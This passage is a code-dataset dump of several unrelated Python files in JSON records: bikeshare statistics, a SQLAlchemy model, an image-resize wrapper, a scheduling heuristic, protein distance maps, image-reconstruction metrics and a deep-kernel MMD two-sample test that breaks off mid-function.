Type'].value_counts()\n print('Number of user types:\\n{}'.format(user_types))\n print('\\n')\n\n # *** SOURCE FOR THE CODE IN THIS FUNCTION: https://stackoverflow.com/questions/24870306/how-to-check-if-a-column-exists-in-pandas#24870404 (chrisb; July 21, 2014) ***\n # TO DO: Display counts of gender\n if 'Gender' in df.columns:\n gender_types = df['Gender'].value_counts()\n print('Number of gender types:\\n{}'.format(gender_types))\n print('\\n')\n else:\n print('The Gender column does not exist.')\n print('\\n')\n\n # TO DO: Display earliest, most recent, and most common year of birth\n if 'Birth Year' in df.columns:\n # Earliest year of birth\n print('Earliest year of birth: {}'.format(int(df['Birth Year'].min())))\n # Most recent year of birth\n print('Most recent year of birth: {}'.format(int(df['Birth Year'].max())))\n # Most common year of birth\n print('Most common year of birth: {}'.format(int(df['Birth Year'].mode())))\n else:\n print('The Birth Year column does not exist.')\n print('\\n')\n\n print(\"\\nThis took %s seconds.\" % start_the_clock())\n print('-'*40)\n\n# *** SOURCE FOR THE CODE IN THIS FUNCTION: Based on code provided by Reviewer from initial submission ***\ndef display_raw_data(df):\n \"\"\" If requested by the user, show the raw data 5 rows at a time \"\"\"\n i = 5\n print('\\n')\n raw = input('Would you like to see the first 5 rows of raw data? ').lower()\n pd.set_option('display.max_columns', 200)\n\n while True: \n if raw == 'no':\n break\n elif raw == 'yes':\n # Display next five rows\n print(df.head(i))\n raw = input(\"Would you like to see the next 5 rows of raw data? \").lower()\n i += 5\n else:\n raw = input(\"\\nYour input is invalid. Please enter only 'yes' or 'no'\\n\").lower()\n \ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n display_raw_data(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n').lower()\n \n while restart != 'yes' and restart != 'no':\n restart = input('\\nWould you like to restart? Enter yes or no.\\n').lower()\n \n if restart == 'no':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":9445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"474314179","text":"\n# -*- coding: utf-8 -*-\nfrom config import db\n\n\nclass ItemContent(db.Model):\n __tablename__ = \"data_item_content\"\n\n id = db.Column(db.Integer, primary_key=True, nullable=False)\n item_id = db.Column(db.Integer)\n is_chapter_title = db.Column(db.SmallInteger)\n chapter_title = db.Column(db.String(200))\n chapter_content = db.Column(db.Text)\n chapter_index = db.Column(db.SmallInteger)\n album_cover = db.Column(db.String(255))\n\n def __init__(self,item_id,is_chapter_title,chapter_title,chapter_content,chapter_index,album_cover):\n '''Constructor'''\n self.item_id=item_id\n self.is_chapter_title=is_chapter_title\n self.chapter_title=chapter_title\n self.chapter_content=chapter_content\n self.chapter_index=chapter_index\n self.album_cover=album_cover\n\n\n def __repr__(self):\n return 'id : %s' % self.id\n\n def updateTable(self,dataDict):\n if dataDict.get(\"id\", None) != None:\n self.id = dataDict.get(\"id\")\n if dataDict.get(\"itemId\", None) != None:\n self.item_id = dataDict.get(\"itemId\")\n if dataDict.get(\"isChapterTitle\", None) != None:\n self.is_chapter_title = dataDict.get(\"isChapterTitle\")\n if dataDict.get(\"chapterTitle\", None) != None:\n self.chapter_title = dataDict.get(\"chapterTitle\")\n if dataDict.get(\"chapterContent\", None) != None:\n self.chapter_content = dataDict.get(\"chapterContent\")\n if dataDict.get(\"chapterIndex\", None) != None:\n self.chapter_index = dataDict.get(\"chapterIndex\")\n if dataDict.get(\"albumCover\", None) != None:\n self.album_cover = dataDict.get(\"albumCover\")\n\n# Client and database attributes dictionary\nclinetHead = {u'id', u'itemId', u'isChapterTitle', u'chapterTitle', u'chapterContent', u'chapterIndex', u'albumCover'}\ntableChangeDic = {\n \"id\":\"id\",\n \"itemId\":\"item_id\",\n \"isChapterTitle\":\"is_chapter_title\",\n \"chapterTitle\":\"chapter_title\",\n \"chapterContent\":\"chapter_content\",\n \"chapterIndex\":\"chapter_index\",\n \"albumCover\":\"album_cover\"\n}\n\nintList = {u'id', u'itemId', u'isChapterTitle', u'chapterIndex'}\n\n# db.create_all()\n","sub_path":"boss_service/models/Data/ItemContent.py","file_name":"ItemContent.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"295704891","text":"#!/usr/bin/env python\n__doc__ = \"\"\"\nScript resizes all images in the folder. Parameters which can be specified by the user.\nscale (default = 0.5) <= how much we downscale images e.g 0.5 makes images of 1/4 or area of orig.\nmodify (default = True) <= are images changed in place (origs are overwritten)\npath (default = '.') <= where to look for images (with subdirectories)\n\nRequires: \n* xvfb to not block the screen\n\nPython: \n* requires python-3.2\n\n:bug:\n\tNone known.\n\t\n:organization:\n\tETH\n\"\"\"\n__authors__=\"\"\"Szymon Stoma\"\"\"\n__contact__=\"\"\n__license__=\"Cecill-C\"\n__date__=\"17-11-01\"\n__version__=\"0.1\"\n__docformat__= \"restructuredtext en\"\n\n# ----------------------------------------------------------- imports\n\n\nimport os\nfrom fnmatch import fnmatch\nimport argparse\nimport subprocess\n\n# ----------------------------------------------------------- conf\n\nconf_fiji_args = ['--headless', '-batch'] \n\n# ----------------------------------------------------------- parsing args\nparser = argparse.ArgumentParser(description=__doc__)\nparser.add_argument('--scale', \n\ttype=float,\n\thelp='how much we downscale images e.g 0.5 makes images of 1/4 or area of orig.',\n\tdefault=0.5\n)\nparser.add_argument('--modify', \n\thelp='are images changed in place (origs are overwritten)?',\n\tdefault=True\n)\nparser.add_argument('--path', \n\thelp='where to look for images (with subdirectories)',\n\tdefault='.'\n)\nparser.add_argument('--file_regexp', \n\thelp='what files to include?',\n\tdefault='*'\n)\nparser.add_argument('--fiji_path', \n\thelp='path to executable fiji',\n\tdefault='fiji'\n)\nparser.add_argument('--version', action='version', version='%(prog)s '+str(__version__))\n\nargs = parser.parse_args()\n\n# ----------------------------------------------------------- getting info about files\n\"\"\"\nroot = args.path\npattern = args.file_regexp\n\nto_process = []\nfor path, subdirs, files in os.walk(root):\n\tfor name in files:\n\t\tif fnmatch(name, pattern):\n\t\t\tto_process.append(os.path.join(path, name))\n\"\"\"\n# print(to_process)\n\n# ----------------------------------------------------------- converting files\n\nsubprocess.run([args.fiji_path, *conf_fiji_args]) ","sub_path":"code/util/resize_all_files_in_subdirectories.py","file_name":"resize_all_files_in_subdirectories.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"512429973","text":"from collections import Counter,defaultdict,deque\nfrom heapq import heappop,heappush,heapify\nimport sys,bisect,math,itertools,fractions,pprint,time,random\nsys.setrecursionlimit(10**8)\nmod = 10**9+7\nINF = float('inf')\ndef inp(): return int(sys.stdin.readline())\ndef inpl(): return list(map(int, sys.stdin.readline().split()))\n\ndef cal(T):\n res = 0\n last = [0] * 26\n for day in range(D):\n t = T[day]; t -= 1\n last[t] = 0\n res += s[day][t]\n for i in range(26):\n if i == t: continue\n last[i] += 1\n res -= c[i] * last[i]\n return res\ndef check_change(td,tq):\n global score,res\n old_q = res[td]\n res[td] = tq\n now = cal(res)\n if now > score:\n score = now\n else:\n res[td] = old_q\ndef out():\n global res\n for x in res:\n print(x)\n quit()\n\nstart_time = time.time()\nn = 26\nD = inp()\nc = inpl()\ns = []\nmax_s = []\nfor i in range(D):\n tmp = inpl()\n mx = 0; ind = -1\n for j in range(n):\n if tmp[j] > mx:\n mx = tmp[j]\n ind = j\n max_s.append(ind+1)\n s.append(tmp)\n\nlast = [0] * n\nres = [-1] * D\nfor d in range(D):\n ans = -1\n mx = -INF\n for i in range(n):\n now = s[d][i]\n for j in range(n):\n if i == j: continue\n now -= s[d][j] * (last[j]+1)\n if now > mx:\n mx = now\n ans = i\n res[d] = ans+1\n for j in range(n):\n last[j] += 1\n if j == ans: last[j] = 0\nscore = cal(res)\n# print(now_score)\n\nwhile True:\n if time.time() - start_time > 1.3: break\n td,tq = random.randrange(0,D), random.randrange(1,n+1)\n check_change(td,tq)\n\nfor x in itertools.combinations(range(D), 2):\n if time.time() - start_time > 1.83: out()\n old = []\n if sum(x^y for x,y in zip(res,max_s)) == 0: continue\n for i in range(2):\n old.append(res[x[i]])\n res[x[i]] = max_s[x[i]]\n now = cal(res)\n if now > score:\n score = now\n else:\n for i in range(2):\n res[x[i]] = old[i]\n","sub_path":"Python_codes/p02618/s452351483.py","file_name":"s452351483.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"481591257","text":"import numpy as np\nimport mdtraj as md\nimport argparse\nimport sys\nimport os\n\nimport MD_init\n\n\ndef getAllCalphaInverseDistances(traj, startID=-1,endID=-1,compr=False):\n\tprint('Compute all C_alpha inverse distances.')\n\tn_frames = int(traj.n_frames)\n\tn_residues = int(traj.n_residues)\n\tprint('n_residues: '+str(n_residues))\n\tall_inds = []\n\n\tif startID == -1: \n\t\t# Construct the distance matrices (n_frames-residue-residue) with the distance \n\t\t# between residues defined as the minimum distance between C_alphas of the two residues.\n\t\t# Do atom selections, save list with all heavy atoms.\n\t\tfor i in range(0,n_residues):\n\t\t\t# Use resid so that multichains can be analyzed also.\n\t\t\tquery = \"protein and name CA and resid \" + str(i)\n\t\t\ttmp_ind = traj.topology.select(query)\n\t\t\tall_inds.append(tmp_ind)\n\t\n\telse:\n\t\t# Construct the distance matrices (n_frames-residue-residue) with the distance \n\t\t# between residues defined as the minimum distance between C_alphas of the two residues.\n\n\t\t# Do atom selections, save list with all heavy atoms.\n\t\tfor i in range(startID,endID+1):\n\t\t\tquery = \"protein and name CA and residue \" + str(i)\n\t\t\ttmp_ind = traj.topology.select(query)\n\t\t\tall_inds.append(tmp_ind)\n\t\n\tn_residues = int(len(all_inds))\t\n\tprint(n_residues*(n_residues-1.0)/2.0)\n\tif compr:\n\t\tdistance_matrices = np.zeros((n_frames,int(n_residues*(n_residues-1.0)/2.0)))\n\telse:\n\t\tdistance_matrices = np.zeros((n_frames,n_residues,n_residues))\n\t\n\tcounter = 0\n\t# Compute distance matrix\n\tfor i in range(0,n_residues):\n\t\tprint(str(i+1)+'/'+str(n_residues))\n\t\tfor j in range(i+1,n_residues):\n\n\t\t\t# Get all atom pairs\t\t\t\n\t\t\tatom_pairs = np.zeros((1,2))\n\t\t\tif len(all_inds[i]) != 0 and len(all_inds[j]) != 0:\n\t\t\t\tatom_pairs[0,0] = all_inds[i]\n\t\t\t\tatom_pairs[0,1] = all_inds[j]\n\t\t\t\tdistances = md.compute_distances(traj, atom_pairs, periodic=False)\n\n\t\t\t\tif len(distances) == 0:\n\t\t\t\t\tprint('The chosen residue does not exist!')\n\n\t\t\t\t# The distance between residues is min distance between all heavy atoms. \n\t\t\t\t# Take residual to get rid of cut-off.\n\t\t\t\tmin_distance = np.min(distances,axis=1)\n\t\t\t\t\n\t\t\t\tif compr:\n\t\t\t\t\tdistance_matrices[:,counter] = 1.0/min_distance\n\t\t\t\t\tcounter = counter + 1\n\t\t\t\telse:\n\t\t\t\t\tdistance_matrices[:,i,j] = 1/min_distance\n\t\t\t\t\tdistance_matrices[:,j,i] = 1/min_distance\n\treturn distance_matrices\n\ndef main(parser):\n\n\tinit = MD_init.MD_initializer()\n\n\t# Initialize trajectory\n\ttraj, args = init.initialize_trajectory(parser)\n\tdomain_label='full'\n\t\n\tif args.cterm:\n\t\t# Select C-term domain\n\t\tstartID = 82\n\t\tendID = 147\n\t\tdomain_label='cterm'\n\telif args.nterm:\n\t\t# Select N-term domain\n\t\tstartID = 5\n\t\tendID = 63\n\t\tdomain_label='nterm'\n\t\n\tprint('Compute all inverse-distance C_alpha maps')\n\tprint('Atom choice: residue ' + str(startID)+' to '+str(endID))\n\tdistance_maps = getAllCalphaInverseDistances(traj, startID=startID,endID=endID,compr=True)\t\n\tnp.save(args.out_directory+'inverse_CA_'+domain_label+'_'+args.file_end_name+'.npy',distance_maps)\n\t\nparser = argparse.ArgumentParser(epilog='Creating distance maps used for clustering/classification. Author: Annie Westerlund.')\nparser.add_argument('-nterm','--nterm',help='Compute distance maps for N-term domain.',action='store_true')\nparser.add_argument('-cterm','--cterm',help='Compute distance maps for C-term domain.',action='store_true')\nmain(parser)\n","sub_path":"cluster_classifier/create_distance_maps.py","file_name":"create_distance_maps.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"115710462","text":"import os\nimport random\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom progressbar import Percentage, Bar, ETA, ProgressBar\nimport imageio\nfrom skimage.metrics import structural_similarity\n\nfrom datasets.longitudinal_dataset import LongitudinalDataset\nfrom experiments.exp_2020_05_09_3 import get_encoder_decoder_generator_discriminator\nfrom testing.utils import preprocess_image, postprocess_image, mse_float, mse_uint8\n\n\nencoder, decoder, generator, discriminator, EXPERIMENT_FOLDER = get_encoder_decoder_generator_discriminator(return_experiment_folder=True)\n\nif not os.path.isdir(os.path.join(EXPERIMENT_FOLDER, 'testing')):\n os.makedirs(os.path.join(EXPERIMENT_FOLDER, 'testing'))\n\n# encoder.save(os.path.join(EXPERIMENT_FOLDER, 'testing', 'encoder'), include_optimizer=False)\n\ndata_dir = '/Users/umutkucukaslan/Desktop/thesis/dataset/processed_data'\nN_SAMPLES = 500\n\ntrain_dataset = LongitudinalDataset(data_dir=os.path.join(data_dir, 'train'))\nval_dataset = LongitudinalDataset(data_dir=os.path.join(data_dir, 'val'))\ntest_dataset = LongitudinalDataset(data_dir=os.path.join(data_dir, 'test'))\n\n\n\n# ====================================\n# define cases for testing\ncases = []\n\nimg_paths = train_dataset.get_ad_images()\ntitle = 'train_ad'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# -----------------------------------\n\nimg_paths = train_dataset.get_mci_images()\ntitle = 'train_mci'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# -----------------------------------\n\nimg_paths = train_dataset.get_cn_images()\ntitle = 'train_cn'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# -----------------------------------\n\nimg_paths = test_dataset.get_ad_images()\ntitle = 'test_ad'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# -----------------------------------\n\nimg_paths = test_dataset.get_mci_images()\ntitle = 'test_mci'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# -----------------------------------\n\nimg_paths = test_dataset.get_cn_images()\ntitle = 'test_cn'\n\nrandom.shuffle(img_paths)\nimg_paths = img_paths[:N_SAMPLES]\ncases.append((img_paths, title))\n# ====================================\n\n\nfor img_paths, title in cases:\n\n widgets = [\n \"Running: \",\n Percentage(),\n \" \",\n Bar(marker=\"#\", left=\"[\", right=\"]\"),\n \" \",\n ETA(),\n ]\n pbar = ProgressBar(widgets=widgets, maxval=len(img_paths))\n pbar.start()\n ssim_indexes = []\n mses = []\n print('starting...')\n for idx in range(len(img_paths)):\n print(title, ' ', idx, ' / ', len(img_paths))\n img_path = img_paths[idx]\n img = imageio.imread(img_path)\n preprocessed_img = preprocess_image(img)\n generated_img = generator(preprocessed_img)\n generated_img = generated_img.numpy()\n generated_img = postprocess_image(generated_img)\n\n ssim_index = structural_similarity(im1=img, im2=generated_img, data_range=255)\n ssim_indexes.append(ssim_index)\n\n mse = mse_uint8(im1=img, im2=generated_img)\n mses.append(mse)\n pbar.update(idx)\n # print('ssim index: {}'.format(round(ssim_index, 2)))\n # img = np.hstack((img, generated_img))\n # cv2.imshow('img', img)\n # pressed_key = cv2.waitKey()\n # if pressed_key == ord('q'):\n # break\n pbar.finish()\n\n mean_ssim = np.mean(ssim_indexes)\n std_ssim = np.std(ssim_indexes)\n print('mean ssim : {}'.format(mean_ssim))\n print('std ssim : {}'.format(std_ssim))\n\n mean_ssim = round(mean_ssim, 4)\n std_ssim = round(std_ssim, 4)\n\n mean_mse = np.mean(mses)\n std_mse = np.std(mses)\n print('mean mse : {}'.format(mean_mse))\n print('std mse : {}'.format(std_mse))\n\n mean_mse = round(mean_mse, 4)\n std_mse = round(std_mse, 4)\n\n plt.figure()\n figure_path = os.path.join(EXPERIMENT_FOLDER, 'testing', 'ssim_' + title + '.jpg')\n plt.hist(ssim_indexes, bins=30)\n plt.title(title + '_ssim mean: {} std: {}'.format(mean_ssim, std_ssim))\n plt.xlabel('SSIM index')\n plt.ylabel('# images')\n plt.savefig(figure_path, dpi=300)\n\n plt.figure()\n figure_path = os.path.join(EXPERIMENT_FOLDER, 'testing', 'mse_' + title + '.jpg')\n plt.hist(mses, bins=30)\n plt.title(title + '_mse mean: {} std: {}'.format(mean_mse, std_mse))\n plt.xlabel('MSE')\n plt.ylabel('# images')\n plt.savefig(figure_path, dpi=300)\n\n plt.show()\n\n\n\n","sub_path":"testing/exp_2020_05_01_ssim_mse.py","file_name":"exp_2020_05_01_ssim_mse.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"417168459","text":"import numpy as np\r\nimport torch\r\nimport torchvision # use it for torch.utils.data\r\nimport freqopttest.data as data\r\nimport freqopttest.tst as tst\r\nimport scipy.stats as stats\r\nimport pdb\r\n\r\nis_cuda = True\r\n\r\nclass ModelLatentF(torch.nn.Module):\r\n \"\"\"define deep networks.\"\"\"\r\n def __init__(self, x_in, H, x_out):\r\n \"\"\"Init latent features.\"\"\"\r\n super(ModelLatentF, self).__init__()\r\n self.restored = False\r\n\r\n self.latent = torch.nn.Sequential(\r\n torch.nn.Linear(x_in, H, bias=True),\r\n torch.nn.Softplus(),\r\n torch.nn.Linear(H, H, bias=True),\r\n torch.nn.Softplus(),\r\n torch.nn.Linear(H, H, bias=True),\r\n torch.nn.Softplus(),\r\n torch.nn.Linear(H, x_out, bias=True),\r\n )\r\n def forward(self, input):\r\n \"\"\"Forward the LeNet.\"\"\"\r\n fealant = self.latent(input)\r\n return fealant\r\n\r\ndef get_item(x, is_cuda):\r\n \"\"\"get the numpy value from a torch tensor.\"\"\"\r\n if is_cuda:\r\n x = x.cpu().detach().numpy()\r\n else:\r\n x = x.detach().numpy()\r\n return x\r\n\r\ndef MatConvert(x, device, dtype):\r\n \"\"\"convert the numpy to a torch tensor.\"\"\"\r\n x = torch.from_numpy(x).to(device, dtype)\r\n return x\r\n\r\ndef Pdist2(x, y):\r\n \"\"\"compute the paired distance between x and y.\"\"\"\r\n x_norm = (x ** 2).sum(1).view(-1, 1)\r\n if y is not None:\r\n y_norm = (y ** 2).sum(1).view(1, -1)\r\n else:\r\n y = x\r\n y_norm = x_norm.view(1, -1)\r\n Pdist = x_norm + y_norm - 2.0 * torch.mm(x, torch.transpose(y, 0, 1))\r\n Pdist[Pdist<0]=0\r\n return Pdist\r\n\r\ndef h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed, use_1sample_U=True):\r\n \"\"\"compute value of MMD and std of MMD using kernel matrix.\"\"\"\r\n Kxxy = torch.cat((Kx,Kxy),1)\r\n Kyxy = torch.cat((Kxy.transpose(0,1),Ky),1)\r\n Kxyxy = torch.cat((Kxxy,Kyxy),0)\r\n nx = Kx.shape[0]\r\n ny = Ky.shape[0]\r\n is_unbiased = True\r\n if is_unbiased:\r\n xx = torch.div((torch.sum(Kx) - torch.sum(torch.diag(Kx))), (nx * (nx - 1)))\r\n yy = torch.div((torch.sum(Ky) - torch.sum(torch.diag(Ky))), (ny * (ny - 1)))\r\n # one-sample U-statistic.\r\n if use_1sample_U:\r\n xy = torch.div((torch.sum(Kxy) - torch.sum(torch.diag(Kxy))), (nx * (ny - 1)))\r\n else:\r\n xy = torch.div(torch.sum(Kxy), (nx * ny))\r\n mmd2 = xx - 2 * xy + yy\r\n else:\r\n xx = torch.div((torch.sum(Kx)), (nx * nx))\r\n yy = torch.div((torch.sum(Ky)), (ny * ny))\r\n # one-sample U-statistic.\r\n if use_1sample_U:\r\n xy = torch.div((torch.sum(Kxy)), (nx * ny))\r\n else:\r\n xy = torch.div(torch.sum(Kxy), (nx * ny))\r\n mmd2 = xx - 2 * xy + yy\r\n if not is_var_computed:\r\n return mmd2, None, Kxyxy\r\n hh = Kx+Ky-Kxy-Kxy.transpose(0,1)\r\n V1 = torch.dot(hh.sum(1)/ny,hh.sum(1)/ny) / ny\r\n V2 = (hh).sum() / (nx) / nx\r\n varEst = 4*(V1 - V2**2)\r\n if varEst == 0.0:\r\n print('error_var!!'+str(V1))\r\n return mmd2, varEst, Kxyxy\r\n\r\ndef MMDu(Fea, len_s, Fea_org, sigma, sigma0=0.1, epsilon = 10**(-10), is_smooth=True, is_var_computed=True, use_1sample_U=True):\r\n \"\"\"compute value of deep-kernel MMD and std of deep-kernel MMD using merged data.\"\"\"\r\n X = Fea[0:len_s, :] # fetch the sample 1 (features of deep networks)\r\n Y = Fea[len_s:, :] # fetch the sample 2 (features of deep networks)\r\n X_org = Fea_org[0:len_s, :] # fetch the original sample 1\r\n Y_org = Fea_org[len_s:, :] # fetch the original sample 2\r\n L = 1 # generalized Gaussian (if L>1)\r\n\r\n nx = X.shape[0]\r\n ny = Y.shape[0]\r\n Dxx = Pdist2(X, X)\r\n Dyy = Pdist2(Y, Y)\r\n Dxy = Pdist2(X, Y)\r\n Dxx_org = Pdist2(X_org, X_org)\r\n Dyy_org = Pdist2(Y_org, Y_org)\r\n Dxy_org = Pdist2(X_org, Y_org)\r\n K_Ix = torch.eye(nx).cuda()\r\n K_Iy = torch.eye(ny).cuda()\r\n if is_smooth:\r\n Kx = (1-epsilon) * torch.exp(-(Dxx / sigma0)**L -Dxx_org / sigma) + epsilon * torch.exp(-Dxx_org / sigma)\r\n Ky = (1-epsilon) * torch.exp(-(Dyy / sigma0)**L -Dyy_org / sigma) + epsilon * torch.exp(-Dyy_org / sigma)\r\n Kxy = (1-epsilon) * torch.exp(-(Dxy / sigma0)**L -Dxy_org / sigma) + epsilon * torch.exp(-Dxy_org / sigma)\r\n else:\r\n Kx = torch.exp(-Dxx / sigma0)\r\n Ky = torch.exp(-Dyy / sigma0)\r\n Kxy = torch.exp(-Dxy / sigma0)\r\n\r\n return h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed, use_1sample_U)\r\n\r\ndef MMDu_linear_kernel(Fea, len_s, is_var_computed=True, use_1sample_U=True):\r\n \"\"\"compute value of (deep) lineaer-kernel MMD and std of (deep) lineaer-kernel MMD using merged data.\"\"\"\r\n try:\r\n X = Fea[0:len_s, :]\r\n Y = Fea[len_s:, :]\r\n except:\r\n X = Fea[0:len_s].unsqueeze(1)\r\n Y = Fea[len_s:].unsqueeze(1)\r\n\r\n Kx = X.mm(X.transpose(0,1))\r\n Ky = Y.mm(Y.transpose(0,1))\r\n Kxy = X.mm(Y.transpose(0,1))\r\n\r\n return h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed, use_1sample_U)\r\n\r\ndef C2ST_NN_fit(S,y,N1,x_in,H,x_out,learning_rate_C2ST,N_epoch,batch_size,device,dtype):\r\n \"\"\"Train a deep network for C2STs.\"\"\"\r\n N = S.shape[0]\r\n if is_cuda:\r\n model_C2ST = ModelLatentF(x_in, H, x_out).cuda()\r\n else:\r\n model_C2ST = ModelLatentF(x_in, H, x_out)\r\n w_C2ST = torch.randn([x_out, 2]).to(device, dtype)\r\n b_C2ST = torch.randn([1, 2]).to(device, dtype)\r\n w_C2ST.requires_grad = True\r\n b_C2ST.requires_grad = True\r\n optimizer_C2ST = torch.optim.Adam(list(model_C2ST.parameters()) + [w_C2ST] + [b_C2ST], lr=learning_rate_C2ST)\r\n criterion = torch.nn.CrossEntropyLoss()\r\n f = torch.nn.Softmax()\r\n ind = np.random.choice(N, N, replace=False)\r\n tr_ind = ind[:np.int(np.ceil(N * 1))]\r\n te_ind = tr_ind\r\n dataset = torch.utils.data.TensorDataset(S[tr_ind, :], y[tr_ind])\r\n dataloader_C2ST = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True)\r\n len_dataloader = len(dataloader_C2ST)\r\n for epoch in range(N_epoch):\r\n data_iter = iter(dataloader_C2ST)\r\n tt = 0\r\n while tt < len_dataloader:\r\n # training model using source data\r\n data_source = data_iter.next()\r\n S_b, y_b = data_source\r\n output_b = model_C2ST(S_b).mm(w_C2ST) + b_C2ST\r\n loss_C2ST = criterion(output_b, y_b)\r\n optimizer_C2ST.zero_grad()\r\n loss_C2ST.backward(retain_graph=True)\r\n # Update sigma0 using gradient descent\r\n optimizer_C2ST.step()\r\n tt = tt + 1\r\n if epoch % 100 == 0:\r\n print(criterion(model_C2ST(S).mm(w_C2ST) + b_C2ST, y).item())\r\n\r\n output = f(model_C2ST(S[te_ind, :]).mm(w_C2ST) + b_C2ST)\r\n pred = output.max(1, keepdim=True)[1]\r\n STAT_C2ST = abs(pred[:N1].type(torch.FloatTensor).mean() - pred[N1:].type(torch.FloatTensor).mean())\r\n return pred, STAT_C2ST, model_C2ST, w_C2ST, b_C2ST\r\n\r\ndef gauss_kernel(X, test_locs, X_org, test_locs_org, sigma, sigma0, epsilon):\r\n \"\"\"compute a deep kernel matrix between a set of samples between test locations.\"\"\"\r\n DXT = Pdist2(X, test_locs)\r\n DXT_org = Pdist2(X_org, test_locs_org)\r\n # Kx = torch.exp(-(DXT / sigma0))\r\n Kx = (1 - epsilon) * torch.exp(-(DXT / sigma0) - DXT_org / sigma) + epsilon * torch.exp(-DXT_org / sigma)\r\n return Kx\r\n\r\ndef compute_ME_stat(X, Y, T, X_org, Y_org, T_org, sigma, sigma0, epsilon):\r\n \"\"\"compute a deep kernel based ME statistic.\"\"\"\r\n # if gwidth is None or gwidth <= 0:\r\n # raise ValueError('require gaussian_width > 0. Was %s.' % (str(gwidth)))\r\n reg = 0#10**(-8)\r\n n = X.shape[0]\r\n J = T.shape[0]\r\n g = gauss_kernel(X, T, X_org, T_org, sigma, sigma0, epsilon)\r\n h = gauss_kernel(Y, T, Y_org, T_org, sigma, sigma0, epsilon)\r\n Z = g - h\r\n W = Z.mean(0)\r\n Sig = ((Z - W).transpose(1, 0)).mm((Z - W))\r\n if is_cuda:\r\n IJ = torch.eye(J).cuda()\r\n else:\r\n IJ = torch.eye(J)\r\n s = n*W.unsqueeze(0).mm(torch.solve(W.unsqueeze(1),Sig + reg*IJ)[0])\r\n return s\r\n\r\ndef mmd2_permutations(K, n_X, permutations=200):\r\n \"\"\"\r\n Fast implementation of permutations using kernel matrix.\r\n \"\"\"\r\n K = torch.as_tensor(K)\r\n n = K.shape[0]\r\n assert K.shape[0] == K.shape[1]\r\n n_Y = n_X\r\n assert n == n_X + n_Y\r\n w_X = 1\r\n w_Y = -1\r\n ws = torch.full((permutations + 1, n), w_Y, dtype=K.dtype, device=K.device)\r\n ws[-1, :n_X] = w_X\r\n for i in range(permutations):\r\n ws[i, torch.randperm(n)[:n_X].numpy()] = w_X\r\n biased_ests = torch.einsum(\"pi,ij,pj->p\", ws, K, ws)\r\n if True: # u-stat estimator\r\n # need to subtract \\sum_i k(X_i, X_i) + k(Y_i, Y_i) + 2 k(X_i, Y_i)\r\n # first two are just trace, but last is harder:\r\n is_X = ws > 0\r\n X_inds = is_X.nonzero()[:, 1].view(permutations + 1, n_X)\r\n Y_inds = (~is_X).nonzero()[:, 1].view(permutations + 1, n_Y)\r\n del is_X, ws\r\n cross_terms = K.take(Y_inds * n + X_inds).sum(1)\r\n del X_inds, Y_inds\r\n ests = (biased_ests - K.trace() + 2 * cross_terms) / (n_X * (n_X - 1))\r\n est = ests[-1]\r\n rest = ests[:-1]\r\n p_val = (rest > est).float().mean()\r\n return est.item(), p_val.item(), rest\r\n\r\ndef TST_MMD_adaptive_bandwidth(Fea, N_per, N1, Fea_org, sigma, sigma0, alpha, device, dtype):\r\n \"\"\"run two-sample test (TST) using ordinary Gaussian kernel.\"\"\"\r\n mmd_vector = np.zeros(N_per)\r\n TEMP = MMDu(Fea, N1, Fea_org, sigma, sigma0, is_smooth=False)\r\n mmd_value = get_item(TEMP[0],is_cuda)\r\n Kxyxy = TEMP[2]\r\n count = 0\r\n nxy = Fea.shape[0]\r\n nx = N1\r\n for r in range(N_per):\r\n # print r\r\n ind = np.random.choice(nxy, nxy, replace=False)\r\n # divide into new X, Y\r\n indx = ind[:nx]\r\n # print(indx)\r\n indy = ind[nx:]\r\n Kx = Kxyxy[np.ix_(indx, indx)]\r\n # print(Kx)\r\n Ky = Kxyxy[np.ix_(indy, indy)]\r\n Kxy = Kxyxy[np.ix_(indx, indy)]\r\n TEMP = h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed=False)\r\n mmd_vector[r] = TEMP[0]\r\n if mmd_vector[r] > mmd_value:\r\n count = count + 1\r\n if count > np.ceil(N_per * alpha):\r\n h = 0\r\n threshold = \"NaN\"\r\n break\r\n else:\r\n h = 1\r\n if h == 1:\r\n S_mmd_vector = np.sort(mmd_vector)\r\n # print(np.int(np.ceil(N_per*alpha)))\r\n threshold = S_mmd_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n return h, threshold, mmd_value.item()\r\n\r\ndef TST_MMD_u(Fea, N_per, N1, Fea_org, sigma, sigma0, ep, alpha, device, dtype, is_smooth=True):\r\n \"\"\"run two-sample test (TST) using deep kernel kernel.\"\"\"\r\n mmd_vector = np.zeros(N_per)\r\n 